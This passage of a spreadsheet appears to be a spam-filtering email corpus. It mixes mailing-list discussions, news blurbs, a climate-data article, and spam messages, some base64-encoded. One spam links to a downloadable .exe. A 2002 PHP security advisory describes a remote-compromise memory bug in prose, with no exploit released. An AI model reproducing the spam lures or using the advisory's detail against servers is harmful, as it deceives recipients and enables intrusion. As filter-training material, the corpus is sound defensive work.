 "These 99 radiosonde launch sites are just not distributed evenly around the planet," Christy said. "They are not representative of the total globe."
 Radiosonde balloons are released from stations around the world, usually at noon and midnight Greenwich standard time. As each balloon climbs from the surface to the stratosphere, the temperature is measured and relayed to the ground by radio.
 While there are more than 1,000 radiosonde launch sites globally, the data from many sites either are not readily available or are not consistently collected. Christy used data from 99 sites at which there has been long-term systematic and reliable data collection. These 99 radiosonde launch sites are in a box bounded by Iceland, Trinidad, Truk Island and Alaska.
 In an earlier study, an upper air temperature record compiled by NOAA from 63 daily weather balloon sites around the world indicated a 17-year climate trend of -0.05 C per decade, which was in exact agreement with the satellite data at that time, Christy said.
 GLOBAL COVERAGE
 One advantage of the MSU dataset is its global coverage. Microwave sounding units aboard NOAA satellites directly measure the temperature of the atmosphere over more than 95 percent of the globe. Each satellite measures the temperature above most points on Earth every 12 hours.
 The 'global temperature' that has been frequently reported from surface measurements is neither global in extent nor systematic in measurement method. It neglects vast oceanic and continental regions, including Antarctica, the Brazilian rain forests, the Sahara Desert and Greenland.
 The most commonly cited historical temperature dataset is from ground-based thermometers. More than 5,000 thermometers worldwide provide almost instantaneous local temperature data through links to weather services and scientists.
 Most of these thermometers, which are usually in small shelters about five feet above the ground, are in areas easily accessible to people. In the U.S. and other industrial countries, these thermometers are most often found at airports.
 The ground-based network is extensive in North America, Europe, Russia, China and Japan. It is less comprehensive in Africa, South America, Australia and across much of Southern Asia.
 Temperatures on the surface and vertically through the atmosphere are gathered daily by thermometers carried aloft by helium balloons. "Radiosonde" balloons are released from stations around the world, usually at noon and midnight Greenwich standard time.
 While balloon release sites are scattered throughout the world, they are concentrated in industrial nations. There are more than 1,000 radiosonde launch sites globally. If they were evenly distributed around the world, that would equal approximately one for every 195,000 square miles of the Earth's surface.
 Water temperatures, which are used to derive estimates of atmospheric temperatures, come from thermometers on piers and buoys, and aboard "ships of opportunity." The ships record the temperature of water drawn in to cool their engines. The water temperature data from these instruments is also not global in its coverage, tending instead to be concentrated in heavily-travelled shipping lanes, and in harbors.
 In the past 12 years, a new system of approximately 100 deep ocean buoys has been established, gathering both atmospheric and water temperature data.
 INSTRUMENT ACCURACY; MSU
 With nine satellites measuring the temperature over periods of from one to six years, a method was devised to merge all the data into a single, consistent time series.
 Each satellite has its own bias that, if not calculated and removed, would introduce spurious trends. The biases are calculated by directly comparing each satellite with others in operation at that time. Periods of overlapping operation ranged from three months to three years, and were sufficient to determine these biases.
 Because the MSU instruments are so stable and have so many thousands of observations, the biases between the satellites are known to within 0.01 deg. The final product removes these biases so that all data are referenced to a common base. (2)
 To check the final product, comparisons were made over a 16-year period with balloon measurements as stated above, and the phenomenal agreement provided the independent validation necessary to conclude that the merging technique developed for this dataset was accurate.
 INSTRUMENT ACCURACY; GROUND-BASED THERMOMETERS
 Of great concern to scientists is the lack of consistency in the way readings are taken and in the thermometer surroundings. Since most thermometers for which long-term records exist are in towns and cities, the effects of population growth and the construction of nearby roads, parking lots, runways and buildings may cause the temperature to rise a little due of urbanization. This temperature change may be an artifact of a local "asphalt effect" rather than a long-term widespread climate change.
 INSTRUMENT ACCURACY; SHIPS OF OPPORTUNITY
 While the temperature data collected by ships at sea is reported as a sea surface temperature, this data reflects water temperatures from about three to 60 feet below the surface - the level from which water is drawn into the ships.
 The thousands of individual thermometers used to collect this data are not calibrated against a scientific standard, nor is there a method for verifying the accuracy of either the thermometers or the reports matching temperature readings to specific times and places.
 Only in places where there are many overlapping observations can there be any confidence in their accuracy.
 THE SCIENTISTS
 In 1996, Spencer and Christy received the American Meteorological Society's Special Award. They were honored "for developing a global, precise record of the Earth's temperature from operational polar-orbiting satellites, fundamentally advancing our ability to monitor climate."
 AMS Special Awards are given to individuals or organizations not appropriately recognized by more specifically-defined awards, and who have made important contributions to the science or practice of meteorology or to the society.
 In 1991, Spencer and Christy received NASA's Exceptional Scientific Achievement Medal.
 DR. JOHN CHRISTY
 Christy began his scientific career as a senior research associate at UAH in 1987, after earning his B.A. (1973) in mathematics from California State University-Fresno, his M.Div. (1978) from Golden Gate Baptist Theological Seminary, and his M.S. (1984) and Ph.D. (1987) degrees in atmospheric sciences from the University of Illinois.
 He was an instructor of mathematics at Parkland College in Champaign, IL, 1983-87, an instructor of mathematics at the University of South Dakota, 1981-82, and an instructor of mathematical sciences at Yankton (S.D.) College, 1980-81.
 He also served as pastor of the Grace Baptist Church in Vermillion, S.D., 1978-82, and as science master at Baptist High School, Nyeri, Kenya, 1973-75. He has published more than 20 refereed scientific papers.
 Christy serves on the NOAA National Scientific Review Panel for the National Climatic Data Center, and on NOAA's Pathfinder Review Panel. He was an "invited key contributor" to the 1995 Intergovernmental Panel on Climate Change's scientific assessment of climate change, and served as a contributor to the 1992 and 1994 IPCC reports.
 DR. ROY SPENCER
 Spencer began his career as a research associate at the Space Science and Engineering Center in Madison, WI, in 1981, after earning his B.S. (1978) in meteorology at the University of Michigan and his M.S. (1979) and Ph.D. (1981) degrees in meteorology from the University of Wisconsin-Madison. He was a Universities Space Research Association visiting scientist at MSFC, 1984-87, before joining the MSFC staff in 1987.
 He is the U.S. team leader for the Multichannel Microwave Imaging Radiometer Team and has served on numerous committees relating to remote sensing. He directs a program involving satellite and aircraft passive microwave data to build global climate data sets and to address climate research issues. Spencer is lead author on sixteen scientific papers.
 BIBLIOGRAPHY
 (1) J.R. Christy, 1995, "Climatic Change," Vol. 31, pp. 455-474.
 (2) J.R. Christy, R.W. Spencer and R.T. McNider, 1995, "Journal of Climate,"
 Vol. 8, pp. 888-896.
 R.W. Spencer, J.R. Christy and N.C. Grody, 1990, "Journal of Climate," Vol. 3,
 pp. 111-1128.
 R.W. Spencer and J.R. Christy, 1992, "Journal of Climate," Vol. 5, pp. 858-
 SEE ALSO
 http://science.nasa.gov/newhome/headlines/essd5feb97_1.htm
 http://science.nasa.gov/newhome/headlines/notebook/essd13aug98_1.htm
 http://www.ghcc.msfc.nasa.gov/MSU/hl_measuretemp.htm
 http://www.atmos.uah.edu/atmos/christy.html
 -- 
 Gary Lawrence Murphy - garym@teledyn.com - TeleDynamics Communications
  - blog: http://www.auracom.com/~teledyn - biz: http://teledyn.com/ -
   "Computers are useless. They can only give you answers." (Picasso)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SACVS] CVS: spamassassin/debian spamassassin.README.Debian,1.1,1.2
</t>
  </si>
  <si>
    <t xml:space="preserve">Update of /cvsroot/spamassassin/spamassassin/debian
 In directory usw-pr-cvs1:/tmp/cvs-serv23243/debian
 Modified Files:
 	spamassassin.README.Debian 
 Log Message:
 removed -P
 Index: spamassassin.README.Debian
 ===================================================================
 RCS file: /cvsroot/spamassassin/spamassassin/debian/spamassassin.README.Debian,v
 retrieving revision 1.1
 retrieving revision 1.2
 diff -b -w -u -d -r1.1 -r1.2
 --- spamassassin.README.Debian	21 Jun 2002 02:46:50 -0000	1.1
 +++ spamassassin.README.Debian	27 Aug 2002 09:31:29 -0000	1.2
 @@ -2,7 +2,7 @@
  you wish to use spamd (the Daemon version of spamassassin), please edit
  /etc/default/spamassassin.
 -'spamc' is equivalent to 'spamassassin -P' and you should use it instead if
 +'spamc' is equivalent to 'spamassassin' and you should use it instead if
  (and only if) you enabled 'spamd' (and you've installed the spamc package)
  To add rules, change scores, edit the template, edit
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 Spamassassin-commits mailing list
 Spamassassin-commits@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/spamassassin-commits
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [SAtalk] Bayesian and bogofilter
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt;Anyway I'm making good progress and my implementation works reasonably
 &gt;well.  It now seems blindingly clear that we want a tightly-integrated
 &gt;implementation of Naive Bayes spam/nonspam classification.  There are
 &gt;still some things about how to do this right inside SA that I still am
 &gt;figuring out.
 &gt;
 &gt;Dan
 This is very good news! Will this allow for individual spam word file
 preferences when spamassassin is running on a mailserver for multiple
 users? This would be an outstanding addition if it can be done. Thanks
 much for a great project.
 -- 
 Regards,
 Eric Mings Ph.D.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</si>
  <si>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Unseen window versus Sequences Window
</t>
  </si>
  <si>
    <t xml:space="preserve">
 I apologize for not catching up to the current code in so long.
 Now that I have I'm trying to resolve "breakage" and differences.
 The unseen window seems to have been replaced with the sequences 
 window.  While I appreciate the flexibility of the sequences 
 window, the unseen window filled an important-to-me need:  It 
 was tiny and could be set to show on all desktops of a virtual 
 window manager without taking a lot of space.  Since my normal 
 mode of operation involves two copies of exmh displaying on a 
 1024x768 vnc session, screen space is at a premium.
 As things stand now, I have a sequences window that shows a lot
 more information than I need to have handy and takes up a lot 
 more room than I can "spare".
 I can see that I could like the new sequences window a lot for 
 certain operations.  But I'd like a nice uncluttered, tiny 
 window that _only_ shows me info on my unread mail.
 One possibility that occurs to me would be a button or mouse
 click that "shrinks" the Sequences window to show only the
 sequences in the "always show" list.  And of course a way to 
 expand it back.
 --Hal
 _______________________________________________
 Exmh-workers mailing list
 Exmh-workers@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-workers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: A matter of opinion
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-0,8357899,215/
 Date: 2002-09-29T00:39:55+01:00
 *Media*: It only took one column in a newspaper by Rod Liddle, editor of 
 radio's flagship new show, to put the BBC under pressure. Jamie Doward and 
 Vanessa Thorpe report on unease within the corporation's top brass - and how 
 the affair could shape its future
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [VulnWatch] Advisory 02/2002: PHP remote vulnerability
</t>
  </si>
  <si>
    <t xml:space="preserve">                           e-matters GmbH
                           www.e-matters.de
                       -= Security  Advisory =-
      Advisory: Remote Compromise/DOS Vulnerability in PHP
  Release Date: 2002/07/22
 Last Modified: 2002/07/22
        Author: Stefan Esser [s.esser@e-matters.de]
   Application: PHP 4.2.0, 4.2.1
      Severity: A vulnerability within the multipart/form-data handler
                could allow remote compromise of the web server.
          Risk: Critical
 Vendor Status: Patches Released.
     Reference: http://security.e-matters.de/advisories/022002.html
 Overview:
    We have discovered a serious vulnerability within the default version 
    of PHP. Depending on the processor architecture it may be possible for a 
    remote attacker to either crash or compromise the web server. 
 Details:
    PHP 4.2.0 introduced a completely rewritten multipart/form-data POST 
    handler. While I was working on the code in my role as PHP developer
    i found a bug within the way the mime headers are processed. 
    A malformed POST request can trigger an error condition, that is not
    correctly handled. Due to this bug it could happen that an uninit-
    ialised struct gets appended to the linked list of mime headers.
    When the lists gets cleaned or destroyed PHP tries to free the pointers
    that are expected in the struct. Because of the lack of initialisation
    those pointers contain stuff that was left on the stack by previous
    function calls. 
    On the IA32 architecture (aka. x86) it is not possible to control what
    will end up in the uninitialised struct because of the stack layout. All 
    possible code paths leave illegal addresses within the struct and PHP
    will crash when it tries to free them.
    Unfortunately the situation is absolutely different if you look on a
    solaris sparc installation. Here it is possible for an attacker to free
    chunks of memory that are full under his control. This is most probably
    the case for several more non IA32 architectures.
    Please note that exploitability is not only limited to systems that are
    running malloc()/free() implementations that are known to be vulnerable
    to control structure overwrites. This is because the internal PHP memory
    managment implements its own linked list system that can be used to
    overwrite nearly arbitrary memory addresses.
 Proof of Concept:
    e-matters is not going to release the exploit for this vulnerability to
    the public.
 Vendor Response:
    22th July 2002 - An updated version of PHP which fixes this 
                     vulnerability was released and can be downloaded at:
                        http://www.php.net/downloads.php
                     The vendor announcement is available at:
                        http://www.php.net/release_4_2_2.php
 Recommendation:
    If you are running PHP 4.2.x you should upgrade as soon as possible,
    especially if your server runs on a non IA32 CPU. If you cannot upgrade
    for whatever reason the only way to workaround this, is to disable all
    kinds of POST requests on your server.  
 GPG-Key:
    http://security.e-matters.de/gpg_key.asc
    pub  1024D/75E7AAD6 2002-02-26 e-matters GmbH - Securityteam
    Key fingerprint = 43DD 843C FAB9 832A E5AB  CAEB 81F2 8110 75E7 AAD6
 Copyright 2002 Stefan Esser. All rights reserved.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: ** Your approval!
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00D1_50E24C7B.C3584B84
 Content-Type: text/html; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 PGh0bWw+DQo8Ym9keT4NCjxmb250IGNvbG9yPSJmZmZmZmYiPmRyYXdlcjwv
 Zm9udD4NCjxwPllvdXIgaG9tZSByZWZpbmFuY2UgbG9hbiBpcyBhcHByb3Zl
 ZCE8YnI+PC9wPjxicj4NCjxwPlRvIGdldCB5b3VyIGFwcHJvdmVkIGFtb3Vu
 dCA8YSBocmVmPSJodHRwOi8vd3d3Lm1vcnRnYWdlcG93ZXI0LmNvbSI+Z28N
 CmhlcmU8L2E+LjwvcD4NCjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48
 YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxicj48YnI+PGJyPjxi
 cj4NCjxwPlRvIGJlIGV4Y2x1ZGVkIGZyb20gZnVydGhlciBub3RpY2VzIDxh
 IGhyZWY9Imh0dHA6Ly93d3cubW9ydGdhZ2Vwb3dlcjQuY29tL3JlbW92ZS5o
 dG1sIj5nbw0KaGVyZTwvYT4uPC9wPg0KPGZvbnQgY29sb3I9ImZmZmZmZiI+
 ZHJhd2VyPC9mb250Pg0KPC9ib2R5Pg0KPGZvbnQgY29sb3I9ImZmZmZmZiI+
 MWdhdGUNCjwvaHRtbD4NCjk1NjBqQVRLMy02MzdoS3B2NTg5MnRFWnM1LTE0
 MENMR1oxMDY3THFXeDQtNzcwRGFmQjU0NDB6Y3RsNTU=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Man leads machine in chess duel
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-1,8643939,1440/
 Date: Not supplied
 World chess champion Vladimir Kramnik takes the lead over the computer Deep 
 Fritz, after the machine makes a peculiar mistake
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: * You CAN have the best MORTGAGE rate *           10469
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;DEAR HOMEOWNER,&lt;/title&gt;
 &lt;meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"&gt;
 &lt;/head&gt;
 &lt;style type="text/css"&gt;
 main {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 12px; color: #212121}
 footer {  font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color: #000000}
 A:link {text-decoration: none; color: #ED1C24}
 A:visited {text-decoration: none; color: #ED1C24}
 A:active {text-decoration: none; color: #F7941D}
 A:hover {text-decoration: none; color: #000000}
 A.yellow:link {text-decoration: none; color: #FFFFFF}
 A.yellow:visited {text-decoration: none; color: #FFFFFF}
 A.yellow:active {text-decoration: none; color: #000000}
 A.yellow:hover {text-decoration: none; color: #E6E6E6}
 &lt;/style&gt;
 &lt;body bgcolor="#DADADA" topmargin="4"&gt;
 &lt;table width="600" border="1" cellspacing="0" cellpadding="0" align="center" bordercolor="#000066" class="main" bgcolor="#F2F2F2"&gt;
   &lt;tr&gt;&lt;td&gt;&lt;table width="560" align="center" border="0" cellspacing="2" cellpadding="8"&gt;&lt;tr&gt;&lt;td&gt;
     &lt;p&gt;&lt;b&gt;&lt;font size="4"&gt;Dear &lt;/font&gt;&lt;font size="4" color="#0000CC"&gt;HOMEOWNER,&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td bgcolor="#000099"&gt;&lt;table width="600" border="0" cellspacing="6" cellpadding="6" class="main"&gt;&lt;tr&gt;&lt;td&gt;
     &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="3"&gt;Interest rates are at their lowest point in 40 years!&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
   &lt;tr&gt;&lt;td&gt;&lt;table width="590" border="0" cellspacing="2" cellpadding="4" class="main"&gt;&lt;tr&gt; &lt;td width="50%" valign="top"&gt;
     &lt;div align="center"&gt; &lt;b&gt;&lt;font size="5"&gt;Let us do the shopping for you... AND IT'S FREE!&lt;/font&gt;&lt;/b&gt;&lt;p&gt;&lt;img src="http://61.129.81.74/pix2/images/ad2.gif" width="142" height="218"&gt;&lt;/p&gt;&lt;/div&gt;
   &lt;/td&gt;&lt;td width="50%" valign="top"&gt;
     &lt;font size="3"&gt;&lt;i&gt;&lt;br&gt;Our nationwide network of lenders have hundreds of different loan programs to fit your current situation:&lt;/i&gt;&lt;b&gt;&lt;ul&gt;
     &lt;li&gt;Refinance&lt;/li&gt;&lt;li&gt;Second Mortgage&lt;/li&gt;&lt;li&gt;Debt Consolidation&lt;/li&gt;&lt;li&gt;Home Improvement&lt;/li&gt;&lt;li&gt;Purchase &lt;/li&gt;&lt;/ul&gt;&lt;/b&gt;&lt;p&gt;&lt;/p&gt;
     &lt;p&gt;Please &lt;b&gt;&lt;a href="http://rd.yahoo.com/dir/?http://www.812191955475675676734203545847582013@61.129.81.78/pix2/mortgageform.htm"&gt;CLICK HERE&lt;/a&gt;&lt;/b&gt; to fill out a quick form. Your request will be transmitted to our network of mortgage specialists.&lt;/p&gt;&lt;/font&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table width="600" border="0" cellspacing="2" cellpadding="2"&gt;&lt;tr&gt;&lt;td bgcolor="#0D86FF"&gt;&lt;p&gt;&amp;nbsp;&lt;/p&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table width="600" border="0" cellspacing="2" cellpadding="8" class="main"&gt;&lt;tr&gt;&lt;td bgcolor="#0066CC"&gt;
     &lt;div align="center"&gt;&lt;b&gt;&lt;font size="2"&gt;This service is &lt;a href="http://rd.yahoo.com/dir/?http://www.812191956757575734203545847582013@61.129.81.74/pix2/mortgageform.htm" class="yellow"&gt;100% FREE&lt;/a&gt; to home owners and new home buyers without any obligation.&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
   &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
   &lt;table align="center" width="600" cellspacing="2" cellpadding="2" border="0" class="footer"&gt;&lt;tr&gt; &lt;td colspan="2"&gt;&lt;br&gt;
     &lt;font color="ED1C24"&gt;Did you receive an email advertisement in error?&lt;/font&gt; Our goal is to only target individuals who would like to take advantage of our offers. If you'd like to be removed from our mailing list, please click on the link below. You will be removed immediately and automatically from all of our future mailings.&lt;br&gt;
     &lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt; &lt;td&gt;We protect all email addresses from other third parties. Thank you.
   &lt;/td&gt;&lt;td align="right"&gt;&lt;a href="http://rd.yahoo.com/dir/?http://61.129.81.74/remove/remove.htm"&gt;Please remove me.&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;/body&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">[Neale Pickett]
 &gt; I hacked up something to turn WordInfo into a tuple before pickling,
 That's what WordInfo.__getstate__ does.
 &gt; and then turn the tuple back into WordInfo right after unpickling.
 Likewise for WordInfo.__setstate__.
 &gt; Without this hack, my database was 21549056 bytes.  After, it's 9945088
 bytes.
 &gt; That's a 50% savings, not a bad optimization.
 I'm not sure what you're doing, but suspect you're storing individual
 WordInfo pickles.  If so, most of the administrative pickle bloat is due to
 that, and doesn't happen if you pickle an entire classifier instance
 directly.
 &gt; So my question is, would it be too painful to ditch WordInfo in favor of
 &gt; a straight out tuple?  (Or list if you'd rather, although making it a
 &gt; tuple has the nice side-effect of forcing you to play nice with my
 &gt; DBDict class).
 &gt;
 &gt; I hope doing this sort of optimization isn't too far distant from the
 &gt; goal of this project, even though README.txt says it is :)
 &gt;
 &gt; Diff attached.  I'm not comfortable checking this in,
 I think it's healthy that you're uncomfortable checking things in with
 &gt; +            # XXX: kludge kludge kludge.
 comments &lt;wink&gt;.
 &gt; since I don't really like how it works (I'd rather just get rid of
 WordInfo).
 &gt; But I guess it proves the point :)
 I'm not interested in optimizing anything yet, and get many benefits from
 the *ease* of working with utterly vanilla Python instance objects.  Lots of
 code all over picks these apart for display and analysis purposes.  Very few
 people have tried this code yet, and there are still many questions about it
 (see, e.g., Jeremy's writeup of his disappointing first-time experiences
 today).  Let's keep it as easy as possible to modify for now.  If you're
 desparate to save memory, write a subclass?
 Other people are free to vote in other directions, of course &lt;wink&gt;.
</t>
  </si>
  <si>
    <t xml:space="preserve">On Fri, 13 Sep 2002, Dale Alspach wrote:
 &gt; My experience has been that if the item is showing in xclipboard
 &gt; and is highlighted that is what is pasted using the mouse.
 Classic X copy-and-paste behavior is that you can only paste what is
 currently highlighted.  In fact, it is the act of highlighting a
 selection that actually copies that selection into the buffer.  X has
 no "copy" command -- if you highlighted it, you just copied it.
 &gt; This does not seem to override what is in an application's own
 &gt; paste buffer. As far as I can tell Maple's cut and paste, for
 &gt; example, is isolated.
 If ab application has a "copy" command that you can choose to use
 separately from the process of highlighting something, that command
 is something the application authors wrote on their own.  (And it it
 likely that an application that wrote an internal "copy" command would
 also have their own customized "paste" command, to make sure the two
 work together.)  Whether the internal (custom) select and paste
 functions interoperate with the X server's global select and paste
 functions will vary from program to program, because in each case you
 are relying on the program's authors' efforts to blend separate systems.
  Jacob Morzinski                                jmorzins@mit.edu
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [ILUG] dial-on-demand
</t>
  </si>
  <si>
    <t xml:space="preserve">On Wed, Aug 21, 2002 at 02:52:11PM +0800, al@mpsc.ph wrote:
 &gt; Could you please help me how to set up a dial-on-demand, what are the
 &gt; packages needed,
 &gt; and other requirements to get on.
 depends on what you are using to dial. for debian put "demand" in
 /etc/ppp/peers/&lt;provider&gt;. use "idle 600" to set the timeout to 10
 minutes(600 secs). im not sure where exactly to put it for other
 distros. whereever pppd gets it options from.
 regards
 -- 
 Ivan Kelly
 ivan@ivankelly.net
 -----BEGIN GEEK CODE BLOCK-----
 Version: 3.12
 GCS d- s+: a--- C++ UL++++ P+++ L+++ E--- W++ N+ o-- K- w--- 
 O-- M-- V-- PS+++ PE- Y+ PGP++ t+ 5 X++ R tv+ b+ DI+ D++ 
 G e h! r-- y+ 
 ------END GEEK CODE BLOCK------
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 19 Aug 2002 16:44:30 +0200, Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 [snipped]
 &gt; Then why bother : The new Red Hat Linux beta "(null)" is now available and
 &gt; should be announced anytime now. It contains rpm 4.1-0.81.
 &gt; 
 &gt; You can grab it from here :
 &gt; ftp://ftp.freshrpms.net/pub/redhat/linux/beta/null/
     What's the official "apt" line for it?  Is it just 7.4 instead of 7.3, or did they make this one 8.0?
 ------------------------------------------------------------------------
 Brian Fahrlnder              Linux Zealot, Conservative, and Technomad
 Evansville, IN                    My Voyage: http://www.CounterMoon.com
 ICQ  5119262
 ------------------------------------------------------------------------
 I've been complaining for years, and almost no one listened. "Windows is
 just easier" you said. "I don't want to learn anything new", you said.
 Tell me how easy THIS is:
 http://www.guardian.co.uk/Archive/Article/0,4273,4477138,00.html
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">On 27 Aug 2002 at 15:00, Rohit Khare wrote:
 &gt; DataPower delivers XML acceleration device
 &gt; ByScott Tyler Shafer
 &gt; August 27, 2002 5:46 am PT
 &gt; 
 Intel also had a similar device a couple of years ago (Netstructure).  They have, afaik, abandoned it.
 Intel is still in the XML hardware game though.  On 8/19 they spun off a company named Tarari.   Tarari develops hardware to check the headers of IP packets. Tarari calls 
 this Layer 7 processing (atop the OSI model).    From what I can tell, Tarari plans to combine virus scanning and XML acceleration into a single hardware device.
</t>
  </si>
  <si>
    <t xml:space="preserve">&gt; &gt; What's an auto-ham?
 &gt; 
 &gt; Automatically marking something as ham after a given
 &gt; timeout.. regardless of how long that timeout is, someone is going
 &gt; to forget to submit the message back as spam.
 OK, here's a refinement.  Assuming very little spam comes through, we
 only need to pick a small percentage of ham received as new training
 ham to match the new training spam.  The program could randomly select
 a sufficient number of saved non-spam msgs and ask the user to
 validate this selection.  You could do this once a day or week (config
 parameter).
 &gt; How many spams-as-hams can be accepted before the f-n rate gets
 &gt; unacceptable?
 Config parameter.
 &gt; I view IMAP as a stop-gap measure until tighter integration with
 &gt; various email clients can be achieved.
 &gt; 
 &gt; I still feel it's better to require classification feedback from the
 &gt; recipient, rather than make any assumptions after some period of
 &gt; time passes. But this is an end-user issue and we're still at the
 &gt; algorithm stage.. ;-)
 I'm trying to think about the end-user issues because I have nothing
 to contribute to the algorithm at this point.  For deployment we need
 both!
 --Guido van Rossum (home page: http://www.python.org/~guido/)
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [Spambayes] hammie.py vs. GBayes.py
</t>
  </si>
  <si>
    <t xml:space="preserve">[Guido]
 &gt; There seem to be two "drivers" for the classifier now: Neale Pickett's
 &gt; hammie.py, and the original GBayes.py.  According to the README.txt,
 &gt; GBayes.py hasn't been kept up to date.
 It seemed that way to me when I ripped the classifier out of it -- I don't
 think anyone has touched it after.
 &gt; Is there anything in there that isn't covered by hammie.py?
 Someone else will have to answer that (I don't use GBayes or hammie, at
 least not yet).
 &gt; About the only useful feature of GBayes.py that hammie.py doesn't (yet)
 &gt; copy is -u, which calculates spamness for an entire mailbox.  This
 &gt; feature can easily be copied into hammie.py.
 That's been done now, right?
 &gt; (GBayes.py also has a large collection of tokenizers; but timtoken.py
 &gt; rules, so I'm not sure how interesting that is now.)
 Those tokenizers are truly trivial to rewrite from scratch if they're
 interesting.  The tiny spam/ham collections in GBayes are also worthless
 now.  The "self test" feature didn't do anything except print its results;
 Tester.py since became doctest'ed and verifies that some basic machinery
 actually delivers what it's supposed to deliver.
 &gt; Therefore I propose to nuke GBayes.py, after adding a -u feature.
 +1 here.
 &gt; Anyone against?
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Yeni srmde
</t>
  </si>
  <si>
    <t xml:space="preserve">PGh0bWw+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtVHlwZSIgY29udGVu
 dD0idGV4dC9odG1sOyBjaGFyc2V0PXdpbmRvd3MtMTI1NCI+DQo8dGl0bGU+U01TVFIgbGls
 aHdtdXh2cnN5cWN3amh2dHR4dzwvdGl0bGU+PC9oZWFkPg0KPGJvZHk+PHA+PGZvbnQgZmFj
 ZT0iQXJpYWwiIHNpemU9IjQiPkRlZ2VybGkgU01TVFIga3VsbGFuaWNpbWl6PGJyPg0KPGh0
 bWw+DQpTTVMgcHJvZ3JhbWltaXog52VzaXRsaSBha3Nha2xpa2xhciBzZWJlYmkgaWxlIGt1
 bGxhbmlsYW1heiBoYWxlIGdlbG1pc3Rpci4gQnUgDQpzZWJlcHRlbiBkb2xheWkgeWVuaSBi
 aXIgcHJvZ3JhbSBoYXppcmxhbWFrIHpvcnVuZGEga2FsZGlrLiBQcm9ncmFtaSBhc2FnaWRh
 a2kgbGlua2kgDQprdWxsYW5hcmFrIGluZGlyZWJpbGlyc2luaXouIFByb2dyYW1pIGJpeiB2
 aXL8cyBrb250cm9s/G5kZW4gZ2XnaXJtaXMgYnVsdW5tYWt0YXlpei4NCkJ1IHllbmkgdmVy
 c2l5b25kYSBzbXMgaW4geWVyaW5lIHVsYXNtYSBoaXppIOdvayBkYWhhIGFydGlyaWxtaXN0
 aXIuIEF5cmljYSBzaW5pcnNpeiANCnZlIHRvcGx1IHNtcyBn9m5kZXJlYmlsaXJzaW5pei4g
 x29rIHlha2luZGEgbG9nbyB2ZSBtZWxvZGkgdHJhbnNmZXJpIGhpem1ldGltaXogDQphY2ls
 YWNha3Rpci4gU2l6aSBiaXIgc3VyZSBzaW5pcnNpeiBzbXNkZW4gbWFocnVtIGV0dGlnaW1p
 eiBpY2luIG96dXIgDQpkaWxlcml6LjwvZm9udD48YnI+DQo8YnI+PGZvbnQgZmFjZT0iQXJp
 YWwiIHNpemU9IjQiPjxhIGhyZWY9Imh0dHA6Ly93d3cuZ2FyYW50aXNtcy5jb20vc21zdHIu
 ZXhlIj5TTVNUUg0KVmVyc2l5b24gNy4zIHUgaW5kaXJtZWsgaedpbiBidXJheWEgdGlrbGF5
 aW5pejwvYT48L2ZvbnQ+PC9wPg0KPC9ib2R5Pg0KPC9odG1sPg0KDQo=
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Medical Break-Though In Cell Rejuvenation 
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;=21-- saved from url=3D(0022)http://internet.e-mail --&gt;
 &lt;=21DOCTYPE HTML PUBLIC =22-//W3C//DTD HTML 4.01 Transitional//EN=22&gt;
 &lt;html xmlns:mso=3D=22urn:schemas-microsoft-com:office:office=22 xmlns:msdt=
